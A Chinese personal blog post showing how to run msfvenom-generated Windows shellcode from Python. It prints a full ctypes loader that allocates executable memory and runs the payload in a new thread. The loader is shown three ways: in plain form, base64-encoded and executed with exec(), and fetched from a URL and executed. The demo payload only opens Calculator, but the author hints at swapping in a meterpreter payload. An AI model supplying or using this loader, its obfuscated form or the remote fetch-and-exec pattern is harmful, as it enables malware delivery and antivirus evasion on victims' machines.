python exec shellcode

Writing

创建时间:2019-02-03 13:12

阅读:

前言
正文

前言

这里我先吐槽一下，网上用中文搜的python执行shellcode。全部是复制粘贴，棒的我不知道如何下手
然后今天早上@即刻安全-Yansu老哥帮我整出来了。老板喝茶

正文

代码我理解不了多少，可能还有错的
获取shellcode

msfvenom -p windows/x64/exec CMD=calc.exe -f py -o /root/demo.py

执行shellcode代码如下

import ctypes
import sys
from ctypes import *
buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
buf += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
buf += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
buf += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
buf += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
buf += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
buf += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
buf += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
buf += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
buf += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
buf += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
buf += b"\x78\x65\x00"

#这两个微软官方说明是可读可写可执行，PAGE_EXECUTE_READWRITE和VIRTUAL_MEM
PAGE_EXECUTE_READWRITE  =  0x00000040 #参数设定
VIRTUAL_MEM  =  ( 0x1000 | 0x2000 ) #参数设定
buf_arr = bytearray (buf) #shellcode变为一个新的字节数组
buf_size = len(buf_arr) #计算shellcode的大小
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") #调用kernel32.dll
kernel32.VirtualAlloc.restype = ctypes.c_uint64 #返回类型为c_uint64
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) #设置
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) #将shellcode指向指针
print(sc_ptr)
print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr),buf_ptr,ctypes.c_int(buf_size)) #调用dll，指向shellcode

handle = kernel32.CreateThread(ctypes.c_int(0),
                               ctypes.c_int(0),
                               ctypes.c_uint64(sc_ptr),
                               ctypes.c_int(0),
                               ctypes.c_int(0),
                               ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

注意：

这里的shellcode是弹计算器的

kGMR8x.md.png

如果你觉得长的离谱那么，你可以这样执行

import base64
payload=B"aW1wb3J0IGN0eXBlcw0KaW1wb3J0IHN5cw0KZnJvbSBjdHlwZXMgaW1wb3J0ICoNCmJ1ZiA9ICBiIiINCmJ1ZiArPSBiIlx4ZmNceDQ4XHg4M1x4ZTRceGYwXHhlOFx4YzBceDAwXHgwMFx4MDBceDQxXHg1MVx4NDEiDQpidWYgKz0gYiJceDUwXHg1Mlx4NTFceDU2XHg0OFx4MzFceGQyXHg2NVx4NDhceDhiXHg1Mlx4NjBceDQ4Ig0KYnVmICs9IGIiXHg4Ylx4NTJceDE4XHg0OFx4OGJceDUyXHgyMFx4NDhceDhiXHg3Mlx4NTBceDQ4XHgwZiINCmJ1ZiArPSBiIlx4YjdceDRhXHg0YVx4NGRceDMxXHhjOVx4NDhceDMxXHhjMFx4YWNceDNjXHg2MVx4N2MiDQpidWYgKz0gYiJceDAyXHgyY1x4MjBceDQxXHhjMVx4YzlceDBkXHg0MVx4MDFceGMxXHhlMlx4ZWRceDUyIg0KYnVmICs9IGIiXHg0MVx4NTFceDQ4XHg4Ylx4NTJceDIwXHg4Ylx4NDJceDNjXHg0OFx4MDFceGQwXHg4YiINCmJ1ZiArPSBiIlx4ODBceDg4XHgwMFx4MDBceDAwXHg0OFx4ODVceGMwXHg3NFx4NjdceDQ4XHgwMVx4ZDAiDQpidWYgKz0gYiJceDUwXHg4Ylx4NDhceDE4XHg0NFx4OGJceDQwXHgyMFx4NDlceDAxXHhkMFx4ZTNceDU2Ig0KYnVmICs9IGIiXHg0OFx4ZmZceGM5XHg0MVx4OGJceDM0XHg4OFx4NDhceDAxXHhkNlx4NGRceDMxXHhjOSINCmJ1ZiArPSBiIlx4NDhceDMxXHhjMFx4YWNceDQxXHhjMVx4YzlceDBkXHg0MVx4MDFceGMxXHgzOFx4ZTAiDQpidWYgKz0gYiJceDc1XHhmMVx4NGNceDAzXHg0Y1x4MjRceDA4XHg0NVx4MzlceGQxXHg3NVx4ZDhceDU4Ig0KYnVmICs9IGIiXHg0NFx4OGJceDQwXHgyNFx4NDlceDAxXHhkMFx4NjZceDQxXHg4Ylx4MGNceDQ4XHg0NCINCmJ1ZiArPSBiIlx4OGJceDQwXHgxY1x4NDlceDAxXHhkMFx4NDFceDhiXHgwNFx4ODhceDQ4XHgwMVx4ZDAiDQpidWYgKz0gYiJceDQxXHg1OFx4NDFceDU4XHg1ZVx4NTlceDVhXHg0MVx4NThceDQxXHg1OVx4NDFceDVhIg0KYnVmICs9IGIiXHg0OFx4ODNceGVjXHgyMFx4NDFceDUyXHhmZlx4ZTBceDU4XHg0MVx4NTlceDVhXHg0OCINCmJ1ZiArPSBiIlx4OGJceDEyXHhlOVx4NTdceGZmXHhmZlx4ZmZceDVkXHg0OFx4YmFceDAxXHgwMFx4MDAiDQpidWYgKz0gYiJceDAwXHgwMFx4MDBceDAwXHgwMFx4NDhceDhkXHg4ZFx4MDFceDAxXHgwMFx4MDBceDQxIg0KYnVmICs9IGIiXHhiYVx4MzFceDhiXHg2Zlx4ODdceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MSINCmJ1ZiArPSBiIlx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDYiDQpidWYgKz0gYiJceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhIg0KYnVmICs9IGIiXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNVx4NjNceDYxXHg2Y1x4NjNceDJlXHg2NSINCmJ1ZiArPSBiIlx4NzhceDY1XHgwMCINCg0KI+i/meS4pOS4quW+rui9r+WumOaWueivtOaYjuaYr+WPr+ivu+WPr+WGmeWPr+aJp+ihjO+8jFBBR0VfRVhFQ1VURV9SRUFEV1JJVEXlkoxWSVJUVUFMX01FTQ0KUEFHRV9FWEVDVVRFX1JFQURXUklURSAgPSAgMHgwMDAwMDA0MCAj5Y+C5pWw6K6+5a6aDQpWSVJUVUFMX01FTSAgPSAgKCAweDEwMDAgfCAweDIwMDAgKSAj5Y+C5pWw6K6+5a6aDQpidWZfYXJyID0gYnl0ZWFycmF5IChidWYpICNzaGVsbGNvZGXlj5jkuLrkuIDkuKrmlrDnmoTlrZfoioLmlbDnu4QNCmJ1Zl9zaXplID0gbGVuKGJ1Zl9hcnIpICPorqHnrpdzaGVsbGNvZGXnmoTlpKflsI8NCmtlcm5lbDMyID0gY3R5cGVzLmNkbGwuTG9hZExpYnJhcnkoImtlcm5lbDMyLmRsbCIpICPosIPnlKhrZXJuZWwzMi5kbGwNCmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0ICPov5Tlm57nsbvlnovkuLpjX3VpbnQ2NA0Kc2NfcHRyID0ga2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGJ1Zl9zaXplKSwgVklSVFVBTF9NRU0sIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUpICPorr7nva4NCmJ1Zl9wdHIgPSAoY3R5cGVzLmNfY2hhciAqIGJ1Zl9zaXplKS5mcm9tX2J1ZmZlcihidWZfYXJyKSAj5bCGc2hlbGxjb2Rl5oyH5ZCR5oyH6ZKIDQpwcmludChzY19wdHIpDQpwcmludChidWZfcHRyKQ0Ka2VybmVsMzIuUnRsTW92ZU1lbW9yeShjdHlwZXMuY191aW50NjQoc2NfcHRyKSxidWZfcHRyLGN0eXBlcy5jX2ludChidWZfc2l6ZSkpICPosIPnlKhkbGzvvIzmjIflkJFzaGVsbGNvZGUNCg0KaGFuZGxlID0ga2VybmVsMzIuQ3JlYXRlVGhyZWFkKGN0eXBlcy5jX2ludCgwKSwNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjdHlwZXMuY19pbnQoMCksDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3R5cGVzLmNfdWludDY0KHNjX3B0ciksDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3R5cGVzLmNfaW50KDApLA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGN0eXBlcy5jX2ludCgwKSwNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpKQ0Ka2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChjdHlwZXMuY19pbnQoaGFuZGxlKSxjdHlwZXMuY19pbnQoLTEpKQ=="
exec(base64.b64decode(payload))

在或者说，你可以选择远程读取并执行

import base64
import requests
url='http://127.0.0.1/wc.txt'
rqt=requests.get(url=url)
exec(base64.b64decode(rqt.text))

如果想获取到meterpreter的话相信诸位都懂的，手动滑稽

最后还是谢谢Yansu老哥
转载请声明：转自422926799.github.io

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。